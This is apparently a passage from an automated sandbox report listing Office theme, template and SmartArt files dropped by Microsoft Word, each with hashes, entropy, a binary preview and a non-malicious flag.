                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):280
                                                      Entropy (8bit):3.5286004619027067
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                      SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                      SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                      SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):1091485
                                                      Entropy (8bit):7.906659368807194
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2192871A20313BEC581B277E405C6322
                                                      SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                      SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                      SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):280
                                                      Entropy (8bit):3.5301133500353727
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                      SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                      SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                      SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):1750795
                                                      Entropy (8bit):7.892395931401988
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:529795E0B55926752462CBF32C14E738
                                                      SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                      SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                      SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):280
                                                      Entropy (8bit):3.528155916440219
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                      SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                      SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                      SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):2357051
                                                      Entropy (8bit):7.929430745829162
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                      SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                      SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                      SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):3.516423078177173
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5402138088A9CF0993C08A0CA81287B8
                                                      SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                      SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                      SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):2218943
                                                      Entropy (8bit):7.942378408801199
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EE33FDA08FBF10EF6450B875717F8887
                                                      SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                      SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                      SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):278
                                                      Entropy (8bit):3.544065206514744
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                      SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                      SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                      SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):2924237
                                                      Entropy (8bit):7.970803022812704
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                      SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                      SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                      SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):286
                                                      Entropy (8bit):3.5434534344080606
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                      SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                      SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                      SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):3078052
                                                      Entropy (8bit):7.954129852655753
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                      SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                      SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                      SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):274
                                                      Entropy (8bit):3.5303110391598502
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                      SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                      SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                      SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):3611324
                                                      Entropy (8bit):7.965784120725206
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FB88BFB743EEA98506536FC44B053BD0
                                                      SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                      SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                      SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.5359188337181853
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0FEA64606C519B78B7A52639FEA11492
                                                      SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                      SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                      SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):274
                                                      Entropy (8bit):3.4699940532942914
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:55BA5B2974A072B131249FD9FD42EB91
                                                      SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                      SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                      SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Word 2007+
                                                      Category:dropped
                                                      Size (bytes):3465076
                                                      Entropy (8bit):7.898517227646252
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                      SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                      SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                      SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):20554
                                                      Entropy (8bit):7.612044504501488
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                      SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                      SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                      SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):21357
                                                      Entropy (8bit):7.641082043198371
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                      SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
